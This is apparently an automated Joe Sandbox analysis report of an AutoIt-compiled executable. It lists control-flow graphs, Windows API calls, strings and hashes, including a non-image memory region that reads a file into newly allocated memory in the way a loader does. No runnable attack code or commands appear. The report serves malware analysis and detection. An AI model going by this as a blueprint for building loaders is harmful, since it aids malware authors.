                                                                    • Part of subcall function 00EE50DB: ShowWindow.USER32(00000000), ref: 00EE513E
                                                                    • Part of subcall function 00EE50DB: ShowWindow.USER32(00000000), ref: 00EE5147
                                                                    • Part of subcall function 00EE59D3: _memset.LIBCMT ref: 00EE59F9
                                                                    • Part of subcall function 00EE59D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00EE5A9E
                                                                  Strings
                                                                  • AutoIt, xrefs: 00F20B23
                                                                  • runas, xrefs: 00F20BE4
                                                                  • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00F20B28
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                  • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                  • API String ID: 529118366-2030392706
                                                                  • Opcode ID: 7b081592a4944e44f99c950635e57286666d9a4a7731b14fd00c54817be79778
                                                                  • Instruction ID: 55c4299094d9b380a05404de6de23ef75e9c91bf432e7bb293aaecd01b1d56c2
                                                                  • Opcode Fuzzy Hash: 7b081592a4944e44f99c950635e57286666d9a4a7731b14fd00c54817be79778
                                                                  • Instruction Fuzzy Hash: 1451F3329183CCAADF11FBB1AC06EEE7BB4AF45344F1020AAF551B2163DEB15545EB21
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 915 3af0227-3af033f call 3af0005 call 3af00e4 * 8 934 3af0342-3af0382 915->934 935 3af038b-3af038f 934->935 936 3af03b5-3af03cd 935->936 937 3af0391-3af03b3 935->937 939 3af03cf-3af03e7 936->939 940 3af0435-3af043c 936->940 937->935 939->940 941 3af03e9-3af03ff 939->941 940->934 941->940 942 3af0401-3af0419 941->942 942->940 943 3af041b-3af0433 942->943 943->940 944 3af0441-3af0452 943->944 946 3af0459-3af0469 944->946 947 3af0454 944->947 950 3af046b 946->950 951 3af0470-3af0493 CreateFileW 946->951 948 3af09c9-3af09ca 947->948 950->948 952 3af049a-3af04cb VirtualAlloc ReadFile 951->952 953 3af0495 951->953 955 3af04cd 952->955 956 3af04d2-3af04e5 952->956 953->948 955->948 958 3af09af 956->958 959 3af04eb-3af09aa 956->959 960 3af09b3-3af09c2 call 3af09cb 958->960 963 3af09c4-3af09c6 ExitProcess 960->963
                                                                  APIs
                                                                  • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 03AF0489
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.256622891.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_3af0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID: -$;$A$r$s
                                                                  • API String ID: 823142352-4219510768
                                                                  • Opcode ID: 7db162c2ebd74bc67c1b738f005f6c91a681447e15ce687d6cfe59f8b2e995a1
                                                                  • Instruction ID: fec394b111e5f2c4b88725e83b8d471c1e0addcd0f46a4ac04d904735c0060d9
                                                                  • Opcode Fuzzy Hash: 7db162c2ebd74bc67c1b738f005f6c91a681447e15ce687d6cfe59f8b2e995a1
                                                                  • Instruction Fuzzy Hash: AF52972095D2D9ADDF02CBF984507FDBFB05F2A102F1845DAE5E1E6283D13A834ADB21
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1071 ee5d13-ee5d73 call ee1207 GetVersionExW call ee1821 1076 ee5e78-ee5e7a 1071->1076 1077 ee5d79 1071->1077 1078 f20fa9-f20fb5 1076->1078 1079 ee5d7c-ee5d81 1077->1079 1082 f20fb6-f20fba 1078->1082 1080 ee5e7f-ee5e80 1079->1080 1081 ee5d87 1079->1081 1083 ee5d88-ee5dbf call ee1981 call ee133d 1080->1083 1081->1083 1084 f20fbc 1082->1084 1085 f20fbd-f20fc9 1082->1085 1094 f21098-f2109b 1083->1094 1095 ee5dc5-ee5dc6 1083->1095 1084->1085 1085->1082 1086 f20fcb-f20fd0 1085->1086 1086->1079 1088 f20fd6-f20fdd 1086->1088 1088->1078 1090 f20fdf 1088->1090 1093 f20fe4-f20fea 1090->1093 1096 ee5e00-ee5e17 GetCurrentProcess IsWow64Process 1093->1096 1097 f210b4-f210b8 1094->1097 1098 f2109d 1094->1098 1099 ee5dcc-ee5dcf 1095->1099 1100 f20fef-f20ffa 1095->1100 1105 ee5e1c-ee5e2d 1096->1105 1106 ee5e19 1096->1106 1107 f210a3-f210ac 1097->1107 1108 f210ba-f210c3 1097->1108 1103 f210a0 1098->1103 1099->1096 1104 ee5dd1-ee5def 1099->1104 1101 f21017-f21019 1100->1101 1102 f20ffc-f21002 1100->1102 1112 f2101b-f21027 1101->1112 1113 f2103c-f2103f 1101->1113 1109 f21004-f21007 1102->1109 1110 f2100c-f21012 1102->1110 1103->1107 1104->1096 1111 ee5df1-ee5df7 1104->1111 1115 ee5e2f-ee5e3f call ee55f0 1105->1115 1116 ee5e98-ee5ea2 GetSystemInfo 1105->1116 1106->1105 1107->1097 1108->1103 1114 f210c5-f210c8 1108->1114 1109->1096 1110->1096 1111->1093 1117 ee5dfd 1111->1117 1118 f21031-f21037 1112->1118 1119 f21029-f2102c 1112->1119 1121 f21041-f21050 1113->1121 1122 f21065-f21068 1113->1122 1114->1107 1128 ee5e8c-ee5e96 GetSystemInfo 1115->1128 1129 ee5e41-ee5e4e call ee55f0 1115->1129 1120 ee5e65-ee5e75 1116->1120 1117->1096 1118->1096 1119->1096 1124 f21052-f21055 1121->1124 1125 f2105a-f21060 1121->1125 1122->1096 1127 f2106e-f21083 1122->1127 1124->1096 1125->1096 1130 f21085-f21088 1127->1130 1131 f2108d-f21093 1127->1131 1133 ee5e56-ee5e5a 1128->1133 1136 ee5e85-ee5e8a 1129->1136 1137 ee5e50-ee5e54 GetNativeSystemInfo 1129->1137 1130->1096 1131->1096 1133->1120 1135 ee5e5c-ee5e5f FreeLibrary 1133->1135 1135->1120 1136->1137 1137->1133
                                                                  APIs
                                                                  • GetVersionExW.KERNEL32(?), ref: 00EE5D40
                                                                    • Part of subcall function 00EE1821: _memmove.LIBCMT ref: 00EE185B
                                                                  • GetCurrentProcess.KERNEL32(?,00F60A18,00000000,00000000,?), ref: 00EE5E07
                                                                  • IsWow64Process.KERNEL32(00000000), ref: 00EE5E0E
                                                                  • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00EE5E54
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00EE5E5F
                                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00EE5E90
                                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00EE5E9C
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                  • String ID:
                                                                  • API String ID: 1986165174-0
                                                                  • Opcode ID: b9cb1e6020257f46666b6f82a882619f6cba6fc9304b4748ac4cdc8753260f7e
                                                                  • Instruction ID: 0927d377f52d49894747d762ec52a224048a3f9f96cb1dedaed8f02eba271e05
                                                                  • Opcode Fuzzy Hash: b9cb1e6020257f46666b6f82a882619f6cba6fc9304b4748ac4cdc8753260f7e
                                                                  • Instruction Fuzzy Hash: 16910832849BC8DEC731CB7594500ABFFE5AF3A304F980A9ED0C7A3A12D630A548D759
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • timeGetTime.WINMM ref: 00EDBF57
                                                                    • Part of subcall function 00ED52B0: PeekMessageW.USER32 ref: 00ED52E6
                                                                  • Sleep.KERNEL32(0000000A,?,?), ref: 00F136B5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePeekSleepTimetime
                                                                  • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                                  • API String ID: 1792118007-922114024
                                                                  • Opcode ID: a74b0580b14c24a072124d5eb9cacc586f8504dbcd905a83ef15ba305484faea
                                                                  • Instruction ID: 1cb46027a231d33d18f1a8b6349d73ded1f0ea621b9c9e0954df206d9ddcc65e
                                                                  • Opcode Fuzzy Hash: a74b0580b14c24a072124d5eb9cacc586f8504dbcd905a83ef15ba305484faea
                                                                  • Instruction Fuzzy Hash: 24C2DF70608341DFC728DF24C844BAAB7E5FF84304F14491EE49AA73A1DB75E985EB82
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00ED3444
                                                                  • RegisterClassExW.USER32 ref: 00ED346E
                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00ED347F
                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00ED349C
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00ED34AC
                                                                  • LoadIconW.USER32(000000A9), ref: 00ED34C2
                                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00ED34D1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                  • API String ID: 2914291525-1005189915
                                                                  • Opcode ID: 31abea4de11e6fa8f901262cdf552ec8fc2a84572e7efbad6e0611bff115a5b2
                                                                  • Instruction ID: d31059297a7ea2ea5f76f4ad3768afd1a1d60220f1979ae01f66a22703f1e0d8
                                                                  • Opcode Fuzzy Hash: 31abea4de11e6fa8f901262cdf552ec8fc2a84572e7efbad6e0611bff115a5b2
                                                                  • Instruction Fuzzy Hash: E231697185530DAFDB409FA4DC88ACEBBF0FB09320F20415AE590E62A0DBB95545EF51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00ED3444
                                                                  • RegisterClassExW.USER32 ref: 00ED346E
                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00ED347F
                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00ED349C
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00ED34AC
                                                                  • LoadIconW.USER32(000000A9), ref: 00ED34C2
                                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00ED34D1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                  • API String ID: 2914291525-1005189915
                                                                  • Opcode ID: f5f30400ea2f4a20269815f0ead39b0de237167786ad3d1125704be1d1902339
                                                                  • Instruction ID: a46e8f28e7ce370b3af51ca7794c5ce5cbf87c420c793c8db53e5a6b7571ce67
                                                                  • Opcode Fuzzy Hash: f5f30400ea2f4a20269815f0ead39b0de237167786ad3d1125704be1d1902339
                                                                  • Instruction Fuzzy Hash: 9D21E7B191430DAFDB00AF94ED49BDE7BF4FB08700F20415AF521A62A0DBB15540EF95
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 629 ee29be-ee29e1 630 f1fd14-f1fd27 call f2ff5c 629->630 631 ee29e7-ee2a19 call ee3df7 call ee3e47 629->631 638 f1fd2e-f1fd43 call f2ff5c 630->638 637 ee2a1e-ee2a20 631->637 637->638 640 ee2a26-ee2a9b call ee1207 call ef0b8b call ee1207 call ef0284 call ee3ea1 call ee410a 637->640 644 f1fd48-f1fd50 638->644 640->644 647 ee2aa1-ee2b10 call ee1207 * 2 call ef0119 call ee17e0 SetCurrentDirectoryW call ee1cb6 * 2 call ef0fe6 call ee433f 640->647 646 f1fd56-f1fd80 call ee42cf call ee49c2 644->646 644->647 662 f1fda3-f1fdba call f2ff5c 646->662 663 f1fd82-f1fd9c call f39b16 646->663 702 ee2b14-ee2b19 647->702 673 ee2c4c-ee2c7e call ee1cb6 * 2 call ee3e25 662->673 675 f1fdbf-f1fe01 call ee4a2f call ef0fe6 663->675 676 f1fd9e call ee4a2f 663->676 693 f1fe03-f1fe12 675->693 694 f1fe14-f1fe16 675->694 676->662 697 f1fe1a-f1fe52 call ee3613 call ee343f 693->697 694->697 709 f20032-f2006a call ee3613 call f3789a call f3fc0d call ef2f85 697->709 710 f1fe58 697->710 704 ee2b1f-ee2b28 call ee3ebe 702->704 705 ee2c19-ee2c3c call ee42cf SetCurrentDirectoryW 702->705 712 ee2b2d-ee2b2f 704->712 705->673 715 ee2c3e-ee2c4b call ef105c * 2 705->715 748 f2006c-f2007f call ee3546 call f271dc 709->748 714 f1fe5c-f1fe87 call ee3613 call f379a4 710->714 712->705 716 ee2b35-ee2b51 call ee2e8f call ee2dfe 712->716 733 f1fea1-f1feac call f3798e 714->733 734 f1fe89-f1fe9c 714->734 715->673 736 f200d0-f200e8 call f2ff5c 716->736 737 ee2b57-ee2b6e call ee2edc call ef2e2c 716->737 749 f1fecd-f1fed8 call f37978 733->749 750 f1feae-f1fec8 733->750 739 f1ffc1 734->739 736->705 762 ee2b8d-ee2b92 737->762 763 ee2b70-ee2b87 call ef386d 737->763 741 f1ffc5-f1ffdc call ee343f 739->741 741->714 756 f1ffe2-f1ffe8 741->756 748->673 765 f1fef2-f1fefd call ee368b 749->765 766 f1feda-f1feed 749->766 750->739 760 f20018-f2001a call f3045f 756->760 761 f1ffea-f1fff5 756->761 777 f2001f-f2002c 760->777 761->760 767 f1fff7-f20016 call ee314d 761->767 771 f200c3-f200cb call f2fdb2 762->771 772 ee2b98-ee2bd8 call ee1a36 call ee27fc call ee1cb6 762->772 763->762 782 ee2c81-ee2c8b 763->782 765->741 784 f1ff03-f1ff1d call f2fef8 765->784 766->739 767->777 771->736 798 ee2bde-ee2be1 772->798 799 ee2cac-ee2cb0 772->799 777->709 777->710 782->762 786 ee2c91-f200be 782->786 791 f1ff4c-f1ff4f 784->791 792 f1ff1f-f1ff4a call ee1a36 call ee1cb6 784->792 786->762 796 f1ff51-f1ff6f call ee1a36 call ee2759 call ee1cb6 791->796 797 f1ff83-f1ff86 791->797 829 f1ff70-f1ff81 call ee3613 792->829 796->829 801 f1ff88-f1ff91 call f2fe19 797->801 802 f1ffaa-f1ffae call f3793a 797->802 804 ee2c9f-ee2ca7 798->804 805 ee2be7-ee2bea 798->805 799->804 819 f20084-f200b0 call f2ff5c call ef105c call ef2f85 801->819 820 f1ff97-f1ffa5 call ef105c 801->820 814 f1ffb3-f1ffc0 call ef105c 802->814 813 ee2c04-ee2c13 804->813 809 ee2c96-ee2c99 805->809 810 ee2bf0-ee2bff call ee314d 805->810 809->804 818 ee2c9b 809->818 810->813 813->702 813->705 814->739 818->804 819->748 820->714 829->814
                                                                  APIs
                                                                    • Part of subcall function 00EF0B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00EE2A3E,?,00008000), ref: 00EF0BA7
                                                                    • Part of subcall function 00EF0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EE2A58,?,00008000), ref: 00EF02A4
                                                                  • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,00000000), ref: 00EE2ADF
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00EE2C2C
                                                                    • Part of subcall function 00EE3EBE: _wcscpy.LIBCMT ref: 00EE3EF6
                                                                    • Part of subcall function 00EF386D: _iswctype.LIBCMT ref: 00EF3875
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                  • API String ID: 537147316-3738523708
                                                                  • Opcode ID: 11048dafd2dda09d4785fd9bb2c53cc0005fc6701b0b4fcc541a479639100e74
                                                                  • Instruction ID: bf7a5d4a00870c13b4a3e7c23165cdfefa57ca012901e1915bdfeccdd7323752
                                                                  • Opcode Fuzzy Hash: 11048dafd2dda09d4785fd9bb2c53cc0005fc6701b0b4fcc541a479639100e74
                                                                  • Instruction Fuzzy Hash: 2002E4715083859FC724EF25C841AAFBBE5FF89314F10092DF599A32A2DB30D989DB42
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 00EF00CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00EE3094), ref: 00EF00ED
                                                                    • Part of subcall function 00EF08C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00EE309F), ref: 00EF08E3
                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00EE30E2
                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00F201BA
                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00F201FB
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00F20239
                                                                  • _wcscat.LIBCMT ref: 00F20292
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                  • API String ID: 2673923337-2727554177
                                                                  • Opcode ID: 14e4b2743da312b79000f687a2556fd572ebf13eba33bb32a722a0b05331a71a
                                                                  • Instruction ID: aace85988f23d579d1ca1439a565ce78b322f2e0bc463286145769be7fd9702d
                                                                  • Opcode Fuzzy Hash: 14e4b2743da312b79000f687a2556fd572ebf13eba33bb32a722a0b05331a71a
                                                                  • Instruction Fuzzy Hash: A871AE724093499EC304EF65EC4196BBBE8FF86390F50192EF545D32A1EF309949EB52
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00EE5156
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00EE5165
                                                                  • LoadIconW.USER32(00000063), ref: 00EE517C
                                                                  • LoadIconW.USER32(000000A4), ref: 00EE518E
                                                                  • LoadIconW.USER32(000000A2), ref: 00EE51A0
                                                                  • LoadImageW.USER32 ref: 00EE51C6
                                                                  • RegisterClassExW.USER32 ref: 00EE521C
                                                                    • Part of subcall function 00ED3411: GetSysColorBrush.USER32(0000000F), ref: 00ED3444
                                                                    • Part of subcall function 00ED3411: RegisterClassExW.USER32 ref: 00ED346E
                                                                    • Part of subcall function 00ED3411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00ED347F
                                                                    • Part of subcall function 00ED3411: InitCommonControlsEx.COMCTL32(?), ref: 00ED349C
                                                                    • Part of subcall function 00ED3411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00ED34AC
                                                                    • Part of subcall function 00ED3411: LoadIconW.USER32(000000A9), ref: 00ED34C2
                                                                    • Part of subcall function 00ED3411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00ED34D1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                  • String ID: #$0$AutoIt v3
                                                                  • API String ID: 423443420-4155596026
                                                                  • Opcode ID: 248394b1d3170b0d0d6806b8bde5b9f4091e77b5cf96ca355a329861e28beff9
                                                                  • Instruction ID: c10fe2894ad6be1d020277cfdfe1794d9b53c3902f53e018cdf03299bee8feae
                                                                  • Opcode Fuzzy Hash: 248394b1d3170b0d0d6806b8bde5b9f4091e77b5cf96ca355a329861e28beff9
                                                                  • Instruction Fuzzy Hash: F3215A71D2430CAFEB10AFA4ED09B9E7BB4FB08314F14015AF504A62A0D7B66950EF84
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 964 ee4d83-ee4dd1 966 ee4dd3-ee4dd6 964->966 967 ee4e31-ee4e33 964->967 968 ee4dd8-ee4ddf 966->968 969 ee4e37 966->969 967->966 970 ee4e35 967->970 973 ee4ead-ee4eb5 PostQuitMessage 968->973 974 ee4de5-ee4dea 968->974 971 f209c2-f209f0 call edc460 call edc483 969->971 972 ee4e3d-ee4e40 969->972 975 ee4e1a-ee4e22 DefWindowProcW 970->975 1011 f209f5-f209fc 971->1011 976 ee4e65-ee4e8c SetTimer RegisterWindowMessageW 972->976 977 ee4e42-ee4e43 972->977 982 ee4e61-ee4e63 973->982 978 f20a35-f20a49 call f32cce 974->978 979 ee4df0-ee4df2 974->979 981 ee4e28-ee4e2e 975->981 976->982 985 ee4e8e-ee4e99 CreatePopupMenu 976->985 983 f20965-f20968 977->983 984 ee4e49-ee4e5c KillTimer call ee5ac3 call ed34e4 977->984 978->982 1004 f20a4f 978->1004 986 ee4df8-ee4dfd 979->986 987 ee4eb7-ee4ec6 call ee5b29 979->987 982->981 990 f2096a-f2096c 983->990 991 f2099e-f209bd MoveWindow 983->991 984->982 985->982 993 f20a1a-f20a21 986->993 994 ee4e03-ee4e08 986->994 987->982 998 f2096e-f20971 990->998 999 f2098d-f20999 SetFocus 990->999 991->982 993->975 1001 f20a27-f20a30 call f28854 993->1001 1002 ee4e0e-ee4e14 994->1002 1003 ee4e9b-ee4eab call ee5bd7 994->1003 998->1002 1007 f20977-f20988 call edc460 998->1007 999->982 1001->975 1002->975 1002->1011 1003->982 1004->975 1007->982 1011->975 1015 f20a02-f20a15 call ee5ac3 call ee59d3 1011->1015 1015->975
                                                                  APIs
                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 00EE4E22
                                                                  • KillTimer.USER32(?,00000001), ref: 00EE4E4C
                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00EE4E6F
                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EE4E7A
                                                                  • CreatePopupMenu.USER32 ref: 00EE4E8E
                                                                  • PostQuitMessage.USER32(00000000), ref: 00EE4EAF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
